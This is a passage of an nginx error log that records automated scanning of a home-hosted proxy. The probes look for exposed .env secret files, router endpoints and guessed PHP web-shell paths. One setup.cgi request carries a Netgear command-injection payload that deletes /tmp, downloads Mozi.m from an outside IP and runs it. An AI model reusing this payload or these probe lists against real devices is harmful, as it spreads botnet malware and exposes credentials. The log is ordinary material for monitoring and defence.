+2026/01/26 18:05:27 [error] 210#210: *1547 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:28 [error] 210#210: *1548 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:28 [error] 210#210: *1549 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:28 [error] 210#210: *1550 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:28 [error] 208#208: *1551 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:29 [error] 208#208: *1552 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:31 [error] 208#208: *1553 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:31 [error] 208#208: *1554 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:31 [error] 208#208: *1555 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:32 [error] 208#208: *1556 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:32 [error] 208#208: *1557 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:32 [error] 208#208: *1558 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:32 [error] 208#208: *1559 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:33 [error] 208#208: *1560 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:34 [error] 208#208: *1561 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:34 [error] 208#208: *1562 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:34 [error] 208#208: *1563 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:34 [error] 211#211: *1564 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:35 [error] 211#211: *1565 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:35 [error] 211#211: *1566 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:35 [error] 211#211: *1567 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:35 [error] 211#211: *1568 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:35 [error] 211#211: *1569 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:35 [error] 211#211: *1570 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:36 [error] 211#211: *1571 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:36 [error] 211#211: *1572 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:36 [error] 211#211: *1573 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:36 [error] 211#211: *1574 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:05:37 [error] 211#211: *1575 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:32:52 [error] 211#211: *1580 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 18:50:41 [error] 209#209: *1587 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 19:15:14 [error] 209#209: *1592 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 52.165.89.103, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "91.82.215.191" +2026/01/26 19:35:12 [error] 209#209: *1606 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 35.231.82.142, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 19:35:12 [error] 210#210: *1603 open() "/var/www/html/nmaplowercheck1769456111" failed (2: No such file or directory), client: 35.231.82.142, server: localhost-nginx-proxy-manager, request: "GET /nmaplowercheck1769456111 HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 19:35:12 [error] 209#209: *1609 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 35.231.82.142, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 19:35:12 [error] 210#210: *1611 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 35.231.82.142, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 19:37:09 [error] 210#210: *1620 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 20:23:04 [error] 210#210: *1633 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 21:08:37 [error] 208#208: *1648 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 21:15:01 [error] 208#208: *1650 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 103.208.231.196, server: localhost-nginx-proxy-manager, request: "POST /HNAP1/ HTTP/1.0", host: "91.82.215.191:80" +2026/01/26 21:20:53 [error] 208#208: *1652 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 21:22:47 [error] 208#208: *1653 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 202.21.42.143, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.21.42.143:41090/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" +2026/01/26 21:53:46 [error] 211#211: *1679 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 22:39:22 [error] 211#211: *1698 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 23:16:35 [error] 222#222: *1709 open() "/var/www/html/dispatch.asp" failed (2: No such file or directory), client: 45.194.92.38, server: localhost-nginx-proxy-manager, request: "GET /dispatch.asp HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 23:16:41 [error] 222#222: *1710 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:41 [error] 222#222: *1710 open() "/var/www/html/f5.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /f5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:42 [error] 222#222: *1710 open() "/var/www/html/vlmusbou.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /vlmusbou.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:42 [error] 222#222: *1710 open() "/var/www/html/zbcymrkz.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /zbcymrkz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:42 [error] 222#222: *1710 open() "/var/www/html/fabes.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /fabes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:42 [error] 222#222: *1710 open() "/var/www/html/55.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /55.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:42 [error] 222#222: *1710 open() "/var/www/html/jb.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /jb.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:43 [error] 222#222: *1710 open() "/var/www/html/948031977f.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /948031977f.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:43 [error] 222#222: *1710 open() "/var/www/html/nlvjg.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /nlvjg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:43 [error] 222#222: *1710 open() "/var/www/html/ne.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /ne.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:43 [error] 222#222: *1710 open() "/var/www/html/V2_xml.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /V2_xml.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:44 [error] 222#222: *1710 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:44 [error] 222#222: *1710 open() "/var/www/html/zz8.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /zz8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:44 [error] 222#222: *1710 open() "/var/www/html/0w1d.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /0w1d.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:44 [error] 222#222: *1710 open() "/var/www/html/hywkehxf.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /hywkehxf.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:44 [error] 222#222: *1710 open() "/var/www/html/1100.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /1100.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:45 [error] 222#222: *1710 open() "/var/www/html/auth.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /auth.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:45 [error] 222#222: *1710 open() "/var/www/html/iov.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /iov.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:45 [error] 222#222: *1710 open() "/var/www/html/rendi59.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /rendi59.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:45 [error] 222#222: *1710 open() "/var/www/html/rivasqup.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /rivasqup.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:46 [error] 222#222: *1710 open() "/var/www/html/zrerbwfu.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /zrerbwfu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:46 [error] 222#222: *1710 open() "/var/www/html/lock1.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /lock1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:46 [error] 222#222: *1710 open() "/var/www/html/ec.inc.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /ec.inc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:46 [error] 222#222: *1710 open() "/var/www/html/lufix.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /lufix.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:46 [error] 222#222: *1710 open() "/var/www/html/nexopjiy.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /nexopjiy.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:47 [error] 222#222: *1710 open() "/var/www/html/obfuscate.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /obfuscate.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:47 [error] 222#222: *1710 open() "/var/www/html/sfcl.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /sfcl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:47 [error] 222#222: *1710 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /403.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:47 [error] 222#222: *1710 open() "/var/www/html/xl6.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /xl6.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:48 [error] 222#222: *1710 open() "/var/www/html/dddd.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /dddd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:48 [error] 222#222: *1710 open() "/var/www/html/xsas.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /xsas.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:48 [error] 222#222: *1710 open() "/var/www/html/acxx.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /acxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:48 [error] 222#222: *1710 open() "/var/www/html/vx.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /vx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:48 [error] 222#222: *1710 open() "/var/www/html/ws29.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /ws29.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:49 [error] 222#222: *1710 open() "/var/www/html/bjfl.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /bjfl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:49 [error] 222#222: *1710 open() "/var/www/html/gettest.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /gettest.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:49 [error] 222#222: *1710 open() "/var/www/html/18299.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /18299.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:49 [error] 222#222: *1710 open() "/var/www/html/358ox1n8.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /358ox1n8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:50 [error] 222#222: *1710 open() "/var/www/html/3yjf52pw.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /3yjf52pw.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:50 [error] 222#222: *1710 open() "/var/www/html/RIP.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /RIP.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:50 [error] 222#222: *1710 open() "/var/www/html/SE8Yj48YnI.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /SE8Yj48YnI.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:50 [error] 222#222: *1710 open() "/var/www/html/Styleshllnes.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /Styleshllnes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:50 [error] 222#222: *1710 open() "/var/www/html/aioezzqp.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /aioezzqp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:51 [error] 222#222: *1710 open() "/var/www/html/bootstrap.cache.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /bootstrap.cache.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:51 [error] 222#222: *1710 open() "/var/www/html/clasa99.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /clasa99.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:51 [error] 222#222: *1710 open() "/var/www/html/ggm3g02p.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /ggm3g02p.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:51 [error] 222#222: *1710 open() "/var/www/html/gs3zjvcs.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /gs3zjvcs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:52 [error] 222#222: *1710 open() "/var/www/html/hu0cqgea.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /hu0cqgea.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:52 [error] 222#222: *1710 open() "/var/www/html/ifl8614n.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /ifl8614n.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:52 [error] 222#222: *1710 open() "/var/www/html/k99zpp7x.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /k99zpp7x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:52 [error] 222#222: *1710 open() "/var/www/html/lvmkntmj.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /lvmkntmj.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:52 [error] 222#222: *1710 open() "/var/www/html/o83l7c5r.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /o83l7c5r.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:53 [error] 222#222: *1710 open() "/var/www/html/up01lmiz.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /up01lmiz.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:53 [error] 222#222: *1710 open() "/var/www/html/w90cxk5w.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /w90cxk5w.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:53 [error] 222#222: *1710 open() "/var/www/html/zbl9cxhv.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /zbl9cxhv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:53 [error] 222#222: *1710 open() "/var/www/html/kqkjkyey.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /kqkjkyey.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:54 [error] 222#222: *1710 open() "/var/www/html/eece497f85.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /eece497f85.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:54 [error] 222#222: *1710 open() "/var/www/html/cbdno.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /cbdno.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:54 [error] 222#222: *1710 open() "/var/www/html/dihyu.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /dihyu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:54 [error] 222#222: *1710 open() "/var/www/html/ dxdwf.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /%E2%80%89dxdwf.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:54 [error] 222#222: *1710 open() "/var/www/html/iswfg.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /iswfg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:55 [error] 222#222: *1710 open() "/var/www/html/jhcqx.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /jhcqx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:55 [error] 222#222: *1710 open() "/var/www/html/knqit.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /knqit.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:55 [error] 222#222: *1710 open() "/var/www/html/mwqrq.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /mwqrq.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:55 [error] 222#222: *1710 open() "/var/www/html/ ndnoq.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /%E2%80%89ndnoq.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:56 [error] 222#222: *1710 open() "/var/www/html/udnkq.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /udnkq.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:56 [error] 222#222: *1710 open() "/var/www/html/xopvne.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /xopvne.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:56 [error] 222#222: *1710 open() "/var/www/html/vxrl.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /vxrl.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:56 [error] 222#222: *1710 open() "/var/www/html/sko.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /sko.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:56 [error] 222#222: *1710 open() "/var/www/html/siln.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /siln.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:57 [error] 222#222: *1710 open() "/var/www/html/sad8210.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /sad8210.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:57 [error] 222#222: *1710 open() "/var/www/html/sad821.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /sad821.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:57 [error] 222#222: *1710 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:57 [error] 222#222: *1710 open() "/var/www/html/2nzyHnOkEg.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /2nzyHnOkEg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:58 [error] 222#222: *1710 open() "/var/www/html/.wp-db.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /.wp-db.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:58 [error] 222#222: *1710 open() "/var/www/html/9EaklzMysJ.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /9EaklzMysJ.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:58 [error] 222#222: *1710 open() "/var/www/html/sa.php7" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /sa.php7 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:58 [error] 222#222: *1710 open() "/var/www/html/villain.php" failed (2: No such file or directory), client: 4.217.180.34, server: localhost-nginx-proxy-manager, request: "GET /villain.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/26 23:16:58 [error] 